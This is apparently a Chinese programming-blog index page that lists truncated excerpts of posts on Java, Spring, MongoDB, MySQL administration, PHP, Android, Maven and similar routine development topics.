Java 字节码之解析一周凡杨 java 字节码 javap
一： Java 字节代码的组织形式类文件 { OxCAFEBABE ，小版本号，大版本号，常量池大小，常量池数组，访问控制标记，当前类信息，父类信息，实现的接口个数，实现的接口信息数组，域个数，域信息数组，方法个数，方法信息数组，属性个数，属性信息数组 } &nbs
java各种小工具代码 g21121 java
1.数组转换成List import java.util.Arrays; Arrays.asList(Object[] obj); 2.判断一个String型是否有值 import org.springframework.util.StringUtils; if (StringUtils.hasText(str)) 3.判断一个List是否有值 import org.spring
加快FineReport报表设计的几个心得体会老A不折腾 finereport
一、从远程服务器大批量取数进行表样设计时，最好按“列顺序”取一个“空的SQL语句”，这样可提高设计速度。否则每次设计时模板均要从远程读取数据，速度相当慢！！二、找一个富文本编辑软件（如NOTEPAD+）编辑SQL语句，这样会很好地检查语法。有时候带参数较多检查语法复杂时，结合FineReport中生成的日志，再找一个第三方数据库访问软件（如PL/SQL）进行数据检索，可以很快定位语法错误。
mysql linux启动与停止墙头上一根草
如何启动/停止/重启MySQL一、启动方式1、使用 service 启动：service mysqld start2、使用 mysqld 脚本启动：/etc/inint.d/mysqld start3、使用 safe_mysqld 启动：safe_mysqld&二、停止1、使用 service 启动：service mysqld stop2、使用 mysqld 脚本启动：/etc/inin
Spring中事务管理浅谈 aijuans spring 事务管理
Spring中事务管理浅谈 By Tony Jiang@2012-1-20 Spring中对事务的声明式管理拿一个XML举例 [html] view plain copy print ? <?xml version="1.0" encoding="UTF-8"?>&nb
php中隐形字符65279（utf-8的BOM头）问题 alxw4616
php中隐形字符65279（utf-8的BOM头）问题今天遇到一个问题. php输出JSON 前端在解析时发生问题:parsererror. 调试: 1.仔细对比字符串发现字符串拼写正确.怀疑是非打印字符的问题. 2.逐一将字符串还原为unicode编码. 发现在字符串头的位置出现了一个 65279的非打印字符.
调用对象是否需要传递对象(初学者一定要注意这个问题) 百合不是茶对象的传递与调用技巧
类和对象的简单的复习,在做项目的过程中有时候不知道怎样来调用类创建的对象,简单的几个类可以看清楚,一般在项目中创建十几个类往往就不知道怎么来看为了以后能够看清楚,现在来回顾一下类和对象的创建,对象的调用和传递(前面写过一篇) 类和对象的基础概念: JAVA中万事万物都是类类有字段(属性),方法,嵌套类和嵌套接
JDK1.5 AtomicLong实例 bijian1013 java thread java多线程 AtomicLong
JDK1.5 AtomicLong实例类 AtomicLong 可以用原子方式更新的 long 值。有关原子变量属性的描述，请参阅 java.util.concurrent.atomic 包规范。AtomicLong 可用在应用程序中（如以原子方式增加的序列号），并且不能用于替换 Long。但是，此类确实扩展了 Number，允许那些处理基于数字类的工具和实用工具进行统一访问。
自定义的RPC的Java实现 bijian1013 java rpc
网上看到纯java实现的RPC，很不错。 RPC的全名Remote Process Call，即远程过程调用。使用RPC，可以像使用本地的程序一样使用远程服务器上的程序。下面是一个简单的RPC 调用实例，从中可以看到RPC如何
【RPC框架Hessian一】Hessian RPC Hello World bit1129 Hello world
什么是Hessian The Hessian binary web service protocol makes web services usable without requiring a large framework, and without learning yet another alphabet soup of protocols. Because it is a binary p
【Spark九十五】Spark Shell操作Spark SQL bit1129 shell
在Spark Shell上，通过创建HiveContext可以直接进行Hive操作 1. 操作Hive中已存在的表 [hadoop@hadoop bin]$ ./spark-shell Spark assembly has been built with Hive, including Datanucleus jars on classpath Welcom
F5　往header加入客户端的ip ronin47
when HTTP_RESPONSE {if {[HTTP::is_redirect]}{ HTTP::header replace Location [string map {:port/ /} [HTTP::header value Location]]HTTP::header replace Lo
java-61-在数组中，数字减去它右边(注意是右边)的数字得到一个数对之差. 求所有数对之差的最大值。例如在数组{2, 4, 1, 16, 7, 5, bylijinnan java
思路来自： http://zhedahht.blog.163.com/blog/static/2541117420116135376632/ 写了个java版的 public class GreatestLeftRightDiff { /** * Q61.在数组中，数字减去它右边(注意是右边)的数字得到一个数对之差。 * 求所有数对之差的最大值。例如在数组
mongoDB 索引开窍的石头 mongoDB索引
在这一节中我们讲讲在mongo中如何创建索引得到当前查询的索引信息 db.user.find(_id:12).explain(); cursor: basicCoursor 指的是没有索引 &
[硬件和系统]迎峰度夏 comsci 系统
从这几天的气温来看，今年夏天的高温天气可能会维持在一个比较长的时间内所以，从现在开始准备渡过炎热的夏天。。。。每间房屋要有一个落地电风扇，一个空调(空调的功率和房间的面积有密切的关系) 坐的，躺的地方要有凉垫，床上要有凉席电脑的机箱
基于ThinkPHP开发的公司官网 cuiyadll 行业系统
后端基于ThinkPHP，前端基于jQuery和BootstrapCo.MZ 企业系统轻量级企业网站管理系统运行环境:PHP5.3+, MySQL5.0 系统预览系统下载：http://www.tecmz.com 预览地址：http://co.tecmz.com 各种设备自适应响应式的网站设计能够对用户产生友好度，并且对于
Transaction and redelivery in JMS (JMS的事务和失败消息重发机制) darrenzhu jms 事务承认 MQ acknowledge
JMS Message Delivery Reliability and Acknowledgement Patterns http://wso2.com/library/articles/2013/01/jms-message-delivery-reliability-acknowledgement-patterns/ Transaction and redelivery in
Centos添加硬盘完全教程 dcj3sjt126com linux centos hardware
Linux的硬盘识别: sda 表示第1块SCSI硬盘 hda 表示第1块IDE硬盘 scd0 表示第1个USB光驱一般使用“fdisk -l”命
yii2 restful web服务路由 dcj3sjt126com PHP yii2
路由随着资源和控制器类准备，您可以使用URL如 http://localhost/index.php?r=user/create访问资源，类似于你可以用正常的Web应用程序做法。在实践中，你通常要用美观的URL并采取有优势的HTTP动词。例如，请求POST /users意味着访问user/create动作。这可以很容易地通过配置urlManager应用程序组件来完成如下所示
MongoDB查询(4)——游标和分页[八] eksliang mongodb MongoDB游标 MongoDB深分页
转载请出自出处：http://eksliang.iteye.com/blog/2177567 一、游标数据库使用游标返回find的执行结果。客户端对游标的实现通常能够对最终结果进行有效控制，从shell中定义一个游标非常简单，就是将查询结果分配给一个变量（用var声明的变量就是局部变量），便创建了一个游标，如下所示： > var
Activity的四种启动模式和onNewIntent() gundumw100 android
Android中Activity启动模式详解　　在Android中每个界面都是一个Activity，切换界面操作其实是多个不同Activity之间的实例化操作。在Android中Activity的启动模式决定了Activity的启动运行方式。　　Android总Activity的启动模式分为四种： Activity启动模式设置： <acti
攻城狮送女友的CSS3生日蛋糕 ini html Web html5 css css3
在线预览：http://keleyi.com/keleyi/phtml/html5/29.htm 代码如下： <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>攻城狮送女友的CSS3生日蛋糕-柯乐义<
读源码学Servlet（1）GenericServlet 源码分析 jzinfo tomcat Web servlet 网络应用网络协议
Servlet API的核心就是javax.servlet.Servlet接口，所有的Servlet 类（抽象的或者自己写的）都必须实现这个接口。在Servlet接口中定义了5个方法，其中有3个方法是由Servlet 容器在Servlet的生命周期的不同阶段来调用的特定方法。先看javax.servlet.servlet接口源码： package
JAVA进阶：VO(DTO)与PO(DAO)之间的转换 snoopy7713 java VO Hibernate po
PO即 Persistence Object　　VO即 Value Object 　VO和PO的主要区别在于：　　VO是独立的Java Object。　　PO是由Hibernate纳入其实体容器（Entity Map）的对象，它代表了与数据库中某条记录对应的Hibernate实体，PO的变化在事务提交时将反应到实际数据库中。　实际上，这个VO被用作Data Transfer
mongodb group by date 聚合查询日期统计每天数据（信息量） qiaolevip 每天进步一点点学习永无止境 mongodb 纵观千象
/* 1 */ { "_id" : ObjectId("557ac1e2153c43c320393d9d"), "msgType" : "text", "sendTime" : ISODate("2015-06-12T11:26:26.000Z")
java之18天常用的类(一) Luob. Math Date System Runtime Rundom
System类 import java.util.Properties; /** * System: * out:标准输出,默认是控制台 * in:标准输入,默认是键盘 * * 描述系统的一些信息 * 获取系统的属性信息:Properties getProperties(); * * * */ public class Sy
maven wuai maven
1、安装maven：解压缩、添加M2_HOME、添加环境变量path 2、创建maven_home文件夹，创建项目mvn_ch01,在其下面建立src、pom.xml，在src下面简历main、test、main下面建立java文件夹 3、编写类，在java文件夹下面依照类的包逐层创建文件夹，将此类放入最后一级文件夹 4、进入mvn_ch01 4.1、mvn compile ,执行后会在

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他